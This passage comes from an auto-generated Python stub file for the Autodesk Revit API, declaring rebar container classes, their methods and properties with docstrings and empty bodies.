""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Bottom = None End0 = None End1 = None FaceWithTagId = None Side0 = None Side1 = None Top = None value__ = None class RebarConstraintType(Enum, IComparable, IFormattable, IConvertible): """ The various types of constraints that can be applied to a RebarConstrainedHandle. enum RebarConstraintType, values: FixedDistanceToHostFace (0), ToCover (1), ToOtherRebar (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass FixedDistanceToHostFace = None ToCover = None ToOtherRebar = None value__ = None class RebarContainer(Element, IDisposable, IEnumerable[RebarContainerItem], IEnumerable): """ An object that represents an Rebar Container Element within the Autodesk Revit project. """ def AppendItemFromCurves(self, style, barType, startHook, endHook, normal, curves, startHookOrient, endHookOrient, useExistingShapeIfPossible, createNewShape): """ AppendItemFromCurves(self: RebarContainer, style: RebarStyle, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, normal: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation, useExistingShapeIfPossible: bool, createNewShape: bool) -> RebarContainerItem """ pass def AppendItemFromCurvesAndShape(self, rebarShape, barType, startHook, endHook, normal, curves, startHookOrient, endHookOrient): """ AppendItemFromCurvesAndShape(self: RebarContainer, rebarShape: RebarShape, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, normal: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation) -> RebarContainerItem """ pass def AppendItemFromRebar(self, rebar): """ AppendItemFromRebar(self: RebarContainer, rebar: Rebar) -> RebarContainerItem Appends an Item to the RebarContainer. Fills its data on base of the Rebar. rebar: The Rebar. Returns: The Rebar Container Item. """ pass def AppendItemFromRebarShape(self, rebarShape, barType, origin, xVector, yVector): """ AppendItemFromRebarShape(self: RebarContainer, rebarShape: RebarShape, barType: RebarBarType, origin: XYZ, xVector: XYZ, yVector: XYZ) -> RebarContainerItem Appends an Item to the RebarContainer. Fills its data on base of the Rebar. rebarShape: A RebarShape element that defines the shape of the rebar. barType: A RebarBarType element that defines bar diameter, bend radius and material of the rebar. origin: The lower-left corner of the shape's bounding box will be placed at this point in the project. xVector: The x-axis in the shape definition will be mapped to this direction in the project. yVector: The y-axis in the shape definition will be mapped to this direction in the project. Returns: The Rebar Container Item. """ pass def CanApplyPresentationMode(self, dBView): """ CanApplyPresentationMode(self: RebarContainer, dBView: View) -> bool Checks if a presentation mode can be applied for this RebarContainer in the given view. dBView: The view in which presentation mode will be applied. Returns: True if presentation mode can be applied for this view, false otherwise. """ pass def ClearItems(self): """ ClearItems(self: RebarContainer) Clears all the Items stored in this Rebar Container element. """ pass def Contains(self, pItem): """ Contains(self: RebarContainer, pItem: RebarContainerItem) -> bool Checks if the RebarContainer has this item as one of its members. pItem: The item to be checked if RebarContainer has it as one of its members Returns: True if RebarContainer has this item as one of its members, false otherwise. """ pass @staticmethod def Create(aDoc, hostElement, rebarContainerTypeId): """ Create(aDoc: Document, hostElement: Element, rebarContainerTypeId: ElementId) -> RebarContainer Creates a new instance of a Rebar Container element within the project. aDoc: A document. hostElement: The element that will host the RebarContainer. rebarContainerTypeId: The id of the RebarContainerType. Returns: The newly created Rebar Container instance. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetEnumerator(self): """ GetEnumerator(self: RebarContainer) -> IEnumerator[RebarContainerItem] Returns an enumerator that iterates through a collection. Returns: An IEnumerator object that can be used to iterate through the collection. """ pass def GetHostId(self): """ GetHostId(self: RebarContainer) -> ElementId The element that contains the rebar. Returns: The element that the rebar object belongs to, such as a structural wall, floor, foundation, beam, brace or column. """ pass def GetItem(self, itemIndex): """ GetItem(self: RebarContainer, itemIndex: int) -> RebarContainerItem Gets the item stored in the RebarContainer at the associated index. itemIndex: Item index in the Rebar Container Returns: Rebar Container Item """ pass def GetParametersManager(self): """ GetParametersManager(self: RebarContainer) -> RebarContainerParameterManager Returns an object used to manage parameters of the Rebar Container. Returns: The parameters manager. """ pass def GetRebarContainerIterator(self): """ GetRebarContainerIterator(self: RebarContainer) -> RebarContainerIterator Returns a Rebar Container Iterator that iterates through the Rebar Container Items. Returns: A Rebar Container Iterator object that can be used to iterate through Rebar Container Items in the collection. """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: RebarContainer) -> RebarRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def HasPresentationOverrides(self, dBView): """ HasPresentationOverrides(self: RebarContainer, dBView: View) -> bool Identifies if any RebarContainerItem of this RebarContainer has overridden default presentation settings for the given view. dBView: The view. Returns: True if if any RebarContainerItem of this RebarContainer has overridden default presentation settings, false otherwise. """ pass def IsItemHidden(self, view, itemIndex): """ IsItemHidden(self: RebarContainer, view: View, itemIndex: int) -> bool Identifies if a given RebarContainerItem is hidden in this view. view: The view. itemIndex: Item index in the Rebar Container. Returns: True if the RebarContainerItem is hidden in this view, false otherwise. """ pass def IsSolidInView(self, view): """ IsSolidInView(self: RebarContainer, view: View3D) -> bool Checks if this RebarContainer element is shown as solid in the given 3D view. view: The 3D view element Returns: True this RebarContainer element is shown as solid in the given 3D view, false otherwise. """ pass def IsUnobscuredInView(self, view): """ IsUnobscuredInView(self: RebarContainer, view: View) -> bool Checks if this rebar container element is shown unobscured in a view. view: The view element Returns: True if rebar is shown unobscured, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def RemoveItem(self, pItem): """ RemoveItem(self: RebarContainer, pItem: RebarContainerItem) Removes Item from the Rebar Container. pItem: Item to be removed from this Rebar Container """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetHostId(self, doc, hostId): """ SetHostId(self: RebarContainer, doc: Document, hostId: ElementId) The element that contains the rebar. doc: The document containing both this element and the host element. hostId: The element that the rebar object belongs to, such as a structural wall, floor, foundation, beam, brace or column. The rebar does not need to be strictly inside the host, but it must be assigned to one host element. """ pass def SetItemHiddenStatus(self, view, itemIndex, hide): """ SetItemHiddenStatus(self: RebarContainer, view: View, itemIndex: int, hide: bool) Sets the RebarContainerItem to be hidden or unhidden in the given view. view: The view. itemIndex: Item index in the Rebar Container. hide: True to hide this RebarContainerItem in the view, false to unhide the item. """ pass def SetSolidInView(self, view, solid): """ SetSolidInView(self: RebarContainer, view: View3D, solid: bool) Sets this RebarContainer element is shown as solid in the given 3D view. view: The 3D view element solid: True if this RebarContainer element is shown as solid in the given 3D view, false otherwise. """ pass def SetUnobscuredInView(self, view, unobscured): """ SetUnobscuredInView(self: RebarContainer, view: View, unobscured: bool) Sets this rebar container element to be shown unobscured in a view. view: The view element unobscured: True if rebar is shown unobscured, false otherwise. """ pass def __contains__(self, *args): #cannot find CLR method """ __contains__[RebarContainerItem](enumerable: IEnumerable[RebarContainerItem], value: RebarContainerItem) -> bool """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __getitem__(self, *args): #cannot find CLR method """ x.__getitem__(y) <==> x[y] """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __iter__(self, *args): #cannot find CLR method """ __iter__(self: IEnumerable) -> object """ pass ItemsCount = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The count of Items in this Rebar Container. Get: ItemsCount(self: RebarContainer) -> int """ PresentItemsAsSubelements = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if Items should be presented in schedules and tags as separate subelements. Get: PresentItemsAsSubelements(self: RebarContainer) -> bool Set: PresentItemsAsSubelements(self: RebarContainer) = value """ ScheduleMark = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Schedule Mark parameter. On creation, the Schedule Mark is set to a value that is unique to the host, but it can be set to any value. Get: ScheduleMark(self: RebarContainer) -> str Set: ScheduleMark(self: RebarContainer) = value """ class RebarContainerItem(object, IDisposable): """ Provides implementation for Rebar stored in RebarContainer. """ def CanApplyPresentationMode(self, dBView): """ CanApplyPresentationMode(self: RebarContainerItem, dBView: View) -> bool Checks if a presentation mode can be applied for this rebar in the given view. dBView: The view in which presentation mode will be applied. Returns: True if presentation mode can be applied for this view, false otherwise. """ pass def CanUseHookType(self, proposedHookId): """ CanUseHookType(self: RebarContainerItem, proposedHookId: ElementId) -> bool Checks if the specified RebarHookType id is of a valid RebarHookType for the Rebar's RebarBarType proposedHookId: The Id of the RebarHookType Returns: Returns true if the id is of a valid RebarHookType for the Rebar element. """ pass def ClearPresentationMode(self, dBView): """ ClearPresentationMode(self: RebarContainerItem, dBView: View) Sets the presentation mode for this rebar set to the default (either for a single view, or for all views). dBView: The view where the presentation mode will be cleared. NULL for all views """ pass def ComputeDrivingCurves(self): """ ComputeDrivingCurves(self: RebarContainerItem) -> IList[Curve] Compute the driving curves. Returns: Returns an empty array if an error is encountered. """ pass def Dispose(self): """ Dispose(self: RebarContainerItem) """ pass def DoesBarExistAtPosition(self, barPosition): """ DoesBarExistAtPosition(self: RebarContainerItem, barPosition: int) -> bool Checks whether a bar exists at the specified position. barPosition: A bar position index between 0 and NumberOfBarPositions-1. """ pass def FindMatchingPredefinedPresentationMode(self, dBView): """ FindMatchingPredefinedPresentationMode(self: RebarContainerItem, dBView: View) -> RebarPresentationMode Determines if there is a matching RebarPresentationMode for the current set of selected hidden and unhidden bars assigned to the given view. dBView: The view. Returns: The presentation mode that matches the current set of selected hidden and unhidden bars. If there is no better match, this returns RebarPresentationMode.Select. """ pass def GetBarPositionTransform(self, barPositionIndex): """ GetBarPositionTransform(self: RebarContainerItem, barPositionIndex: int) -> Transform Return a transform representing the relative position of any individual bar in the set. barPositionIndex: An index between 0 and (NumberOfBarPositions-1). Returns: The position of a bar in the set relative to the first position. """ pass def GetBendData(self): """ GetBendData(self: RebarContainerItem) -> RebarBendData Gets the RebarBendData, containing bar and hook information, of the instance. """ pass def GetCenterlineCurves(self, adjustForSelfIntersection, suppressHooks, suppressBendRadius, multiplanarOption=None): """ GetCenterlineCurves(self: RebarContainerItem, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. GetCenterlineCurves(self: RebarContainerItem, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool, multiplanarOption: MultiplanarOption) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. multiplanarOption: If the Rebar is a multi-planar shape, this parameter controls whether to generate only the curves in the primary plane (IncludeOnlyPlanarCurves), or to generate all curves, (IncludeAllMultiplanarCurves) including the out-of-plane connector segments as well as multi-planar copies of the primary plane curves. This argument is ignored for planar shapes. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. """ pass def GetDistributionPath(self): """ GetDistributionPath(self: RebarContainerItem) -> Line The distribution path of a rebar set. Returns: A line beginning at (0, 0, 0) and representing the direction and length of the set. """ pass def GetHookOrientation(self, iEnd): """ GetHookOrientation(self: RebarContainerItem, iEnd: int) -> RebarHookOrientation Returns the orientation of the hook plane at the start or at the end of the rebar with respect to the orientation of the first or the last curve and the plane normal. iEnd: 0 for the start hook, 1 for the end hook. Returns: Value = Right: The hook is on your right as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." Value = Left: The hook is on your left as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." """ pass def GetHookTypeId(self, end): """ GetHookTypeId(self: RebarContainerItem, end: int) -> ElementId Get the id of the RebarHookType to be applied to the rebar. end: 0 for the start hook, 1 for the end hook. Returns: The id of a RebarHookType, or invalidElementId if the rebar has no hook at the specified end. """ pass def GetPresentationMode(self, dBView): """ GetPresentationMode(self: RebarContainerItem, dBView: View) -> RebarPresentationMode Gets the presentaion mode for this rebar set when displayed in the given view. dBView: The view. Returns: The presentation mode. """ pass def HasPresentationOverrides(self, dBView): """ HasPresentationOverrides(self: RebarContainerItem, dBView: View) -> bool Identifies if this rebar set has overridden default presentation settings for the given view. dBView: The view. Returns: True if this rebar set has overriden default presentation settings, false otherwise. """ pass def IsBarHidden(self, view, barIndex): """ IsBarHidden(self: RebarContainerItem, view: View, barIndex: int) -> bool Identifies if a given bar in this rebar set is hidden in this view. view: The view. barIndex: The index of the bar from this rebar set. Returns: True if the bar is hidden in this view, false otherwise. """ pass def IsRebarInSection(self, dBView): """ IsRebarInSection(self: RebarContainerItem, dBView: View) -> bool Identifies if this rebar set is shown as a cross-section in the given view. dBView: The view. Returns: True if this rebar set is shown as a cross-section, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarContainerItem, disposing: bool) """ pass def SetBarHiddenStatus(self, view, barIndex, hide): """ SetBarHiddenStatus(self: RebarContainerItem, view: View, barIndex: int, hide: bool) Sets the bar in this rebar set to be hidden or unhidden in the given view. view: The view. barIndex: The index of the bar from this set. hide: True to hide this bar in the view, false to unhide the bar. """ pass def SetFromCurves(self, style, barType, startHook, endHook, norm, curves, startHookOrient, endHookOrient, useExistingShapeIfPossible, createNewShape): """ SetFromCurves(self: RebarContainerItem, style: RebarStyle, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, norm: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation, useExistingShapeIfPossible: bool, createNewShape: bool) """ pass def SetFromCurvesAndShape(self, rebarShape, barType, startHook, endHook, norm, curves, startHookOrient, endHookOrient): """ SetFromCurvesAndShape(self: RebarContainerItem, rebarShape: RebarShape, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, norm: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation) """ pass def SetFromRebar(self, rebar): """ SetFromRebar(self: RebarContainerItem, rebar: Rebar) Set an instance of a RebarContainerItem element according to a Rebar parameters. rebar: The Rebar. """ pass def SetFromRebarShape(self, rebarShape, barType, origin, xVec, yVec): """ SetFromRebarShape(self: RebarContainerItem, rebarShape: RebarShape, barType: RebarBarType, origin: XYZ, xVec: XYZ, yVec: XYZ) Set an instance of a RebarContainerItem element, as an instance of a RebarShape. The instance will have the default shape parameters from the RebarShape, and its location is based on the bounding box of the shape in the shape definition. Hooks are removed from the shape before computing its bounding box. If appropriate hooks can be found in the document, they will be assigned arbitrarily. rebarShape: A RebarShape element that defines the shape of the rebar. barType: A RebarBarType element that defines bar diameter, bend radius and material of the rebar. origin: The lower-left corner of the shape's bounding box will be placed at this point in the project. xVec: The x-axis in the shape definition will be mapped to this direction in the project. yVec: The y-axis in the shape definition will be mapped to this direction in the project. """ pass def SetHookOrientation(self, iEnd, hookOrientation): """ SetHookOrientation(self: RebarContainerItem, iEnd: int, hookOrientation: RebarHookOrientation) Defines the orientation of the hook plane at the start or at the end of the rebar with respect to the orientation of the first or the last curve and the plane normal. iEnd: 0 for the start hook, 1 for the end hook. hookOrientation: Only two values are permitted: Value = Right: The hook is on your right as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." Value = Left: The hook is on your left as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." """ pass def SetHookTypeId(self, end, hookTypeId): """ SetHookTypeId(self: RebarContainerItem, end: int, hookTypeId: ElementId) Set the id of the RebarHookType to be applied to the rebar. end: 0 for the start hook, 1 for the end hook. hookTypeId: The id of a RebarHookType element, or invalidElementId if the rebar should have no hook at the specified end. """ pass def SetLayoutAsFixedNumber(self, numberOfBarPositions, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsFixedNumber(self: RebarContainerItem, numberOfBarPositions: int, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to FixedNumber. numberOfBarPositions: The number of bar positions in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsMaximumSpacing(self, spacing, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsMaximumSpacing(self: RebarContainerItem, spacing: float, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to MaximumSpacing spacing: The maximum spacing between rebar in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsMinimumClearSpacing(self, spacing, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsMinimumClearSpacing(self: RebarContainerItem, spacing: float, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to MinimumClearSpacing spacing: The maximum spacing between rebar in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsNumberWithSpacing(self, numberOfBarPositions, spacing, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsNumberWithSpacing(self: RebarContainerItem, numberOfBarPositions: int, spacing: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to NumberWithSpacing numberOfBarPositions: The number of bar positions in rebar set spacing: The maximum spacing between rebar in rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsSingle(self): """ SetLayoutAsSingle(self: RebarContainerItem) Sets the Layout Rule property of rebar set to Single. """ pass def SetPresentationMode(self, dBView, presentationMode): """ SetPresentationMode(self: RebarContainerItem, dBView: View, presentationMode: RebarPresentationMode) Sets the presentation mode for this rebar set when displayed in the given view. dBView: The view. presentationMode: The presentation mode. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass ArrayLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the distribution path length of rebar set. Get: ArrayLength(self: RebarContainerItem) -> float Set: ArrayLength(self: RebarContainerItem) = value """ BarsOnNormalSide = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal. Get: BarsOnNormalSide(self: RebarContainerItem) -> bool Set: BarsOnNormalSide(self: RebarContainerItem) = value """ BarTypeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The identifier of the rebar bar type. Get: BarTypeId(self: RebarContainerItem) -> ElementId """ BaseFinishingTurns = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the number of finishing turns at the lower end of the spiral. Get: BaseFinishingTurns(self: RebarContainerItem) -> int Set: BaseFinishingTurns(self: RebarContainerItem) = value """ Height = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the overall height. Get: Height(self: RebarContainerItem) -> float Set: Height(self: RebarContainerItem) = value """ IncludeFirstBar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the first bar in rebar set is shown. Get: IncludeFirstBar(self: RebarContainerItem) -> bool Set: IncludeFirstBar(self: RebarContainerItem) = value """ IncludeLastBar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the last bar in rebar set is shown. Get: IncludeLastBar(self: RebarContainerItem) -> bool Set: IncludeLastBar(self: RebarContainerItem) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarContainerItem) -> bool """ ItemIndex = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The index of this item in its associated RebarContainer. Get: ItemIndex(self: RebarContainerItem) -> int """ LayoutRule = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the layout rule of rebar set. Get: LayoutRule(self: RebarContainerItem) -> RebarLayoutRule """ MaxSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the maximum spacing between rebar in rebar set. Get: MaxSpacing(self: RebarContainerItem) -> float Set: MaxSpacing(self: RebarContainerItem) = value """ MultiplanarDepth = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a multiplanar rebar, the depth of the instance. Get: MultiplanarDepth(self: RebarContainerItem) -> float Set: MultiplanarDepth(self: RebarContainerItem) = value """ Normal = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A unit-length vector normal to the plane of the rebar Get: Normal(self: RebarContainerItem) -> XYZ """ NumberOfBarPositions = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of potential bars in the set. Get: NumberOfBarPositions(self: RebarContainerItem) -> int Set: NumberOfBarPositions(self: RebarContainerItem) = value """ Pitch = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the pitch, or vertical distance traveled in one rotation. Get: Pitch(self: RebarContainerItem) -> float Set: Pitch(self: RebarContainerItem) = value """ Quantity = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the number of bars in rebar set. Get: Quantity(self: RebarContainerItem) -> int """ RebarShapeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The RebarShape element that defines the shape of the rebar. Get: RebarShapeId(self: RebarContainerItem) -> ElementId Set: RebarShapeId(self: RebarContainerItem) = value """ TopFinishingTurns = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the number of finishing turns at the upper end of the spiral. Get: TopFinishingTurns(self: RebarContainerItem) -> int Set: TopFinishingTurns(self: RebarContainerItem) = value """ TotalLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length of an individual bar multiplied by Quantity. Get: TotalLength(self: RebarContainerItem) -> float """ Volume = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The volume of an individual bar multiplied by Quantity. Get: Volume(self: RebarContainerItem) -> float """ class RebarContainerIterator(object, IEnumerator[RebarContainerItem], IDisposable, IEnumerator): """ An iterator to a Rebar Container. """ def Dispose(self): """ Dispose(self: RebarContainerIterator) """ pass def MoveNext(self): """ MoveNext(self: RebarContainerIterator) -> bool Increments the iterator to the next item. Returns: True if there is a next available item in this iterator. False if the iterator has completed all available items. """ pass def next(self, *args): #cannot find CLR method """ next(self: object) -> object """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarContainerIterator, disposing: bool) """ pass def Reset(self): """ Reset(self: RebarContainerIterator) Resets the iterator to the initial state. """ pass def __contains__(self, *args): #cannot find CLR method """ __contains__[RebarContainerItem](enumerator: IEnumerator[RebarContainerItem], value: RebarContainerItem) -> bool """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __iter__(self, *args): #cannot find CLR method """ __iter__(self: IEnumerator) -> object """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Current = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Gets the item at the current position of the iterator. Get: Current(self: RebarContainerIterator) -> RebarContainerItem """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarContainerIterator) -> bool """ class RebarContainerParameterManager(object, IDisposable): """ Provides implementation of RebarContainer parameters overrides. """ def AddOverride(self, paramId, value): """ AddOverride(self: RebarContainerParameterManager, paramId: ElementId, value: int) Adds an override for the given parameter as its value will be displayed for the Rebar Container element. paramId: The id of the parameter value: The override value of the parameter. AddOverride(self: RebarContainerParameterManager, paramId: ElementId, value: float) Adds an override for the given parameter as its value will be displayed for the Rebar Container element. paramId: The id of the parameter value: The override value of the parameter. AddOverride(self: RebarContainerParameterManager, paramId: ElementId, value: ElementId) Adds an override for the given parameter as its value will be displayed for the Rebar Container element. paramId: The id of the parameter value: The override value of the parameter. AddOverride(self: RebarContainerParameterManager, paramId: ElementId, value: str) Adds an override for the given parameter as its value will be displayed for the Rebar Container element. paramId: The id of the parameter value: The override value of the parameter. """ pass def AddSharedParameterAsOverride(self, paramId): """ AddSharedParameterAsOverride(self: RebarContainerParameterManager, paramId: ElementId) Adds a shared parameter as one of the parameter overrides stored by this Rebar Container element. paramId: The id of the shared parameter element """ pass def ClearOverrides(self): """ ClearOverrides(self: RebarContainerParameterManager) Clears any overridden values from all parameters of the associated RebarContainer element. """ pass def Dispose(self): """ Dispose(self: RebarContainerParameterManager) """ pass def IsOverriddenParameterModifiable(self, paramId): """ IsOverriddenParameterModifiable(self: RebarContainerParameterManager, paramId: ElementId) -> bool Checks if overridden parameter is modifiable. paramId: Overridden parameter id Returns: True if the parameter is modifiable, false if the parameter is readonly. """ pass def IsParameterOverridden(self, paramId): """ IsParameterOverridden(self: RebarContainerParameterManager, paramId: ElementId) -> bool Checks if the parameter has an override paramId: The id of the parameter element Returns: True if the parameter has an override """ pass def IsRebarContainerParameter(self, paramId): """ IsRebarContainerParameter(self: RebarContainerParameterManager, paramId: ElementId) -> bool Checks if the parameter is a Rebar Container parameter paramId: The id of the parameter element Returns: True if the parameter is a Rebar Container parameter """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarContainerParameterManager, disposing: bool) """ pass def RemoveOverride(self, paramId): """ RemoveOverride(self: RebarContainerParameterManager, paramId: ElementId) Removes an overridden value from the given parameter. paramId: The id of the parameter """ pass def SetOverriddenParameterModifiable(self, paramId): """ SetOverriddenParameterModifiable(self: RebarContainerParameterManager, paramId: ElementId) Sets this overridden parameter to be modifiable. paramId: Overridden parameter id """ pass def SetOverriddenParameterReadonly(self, paramId): """ SetOverriddenParameterReadonly(self: RebarContainerParameterManager, paramId: ElementId) Sets this overridden parameter to be readonly. paramId: Overridden parameter id """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: 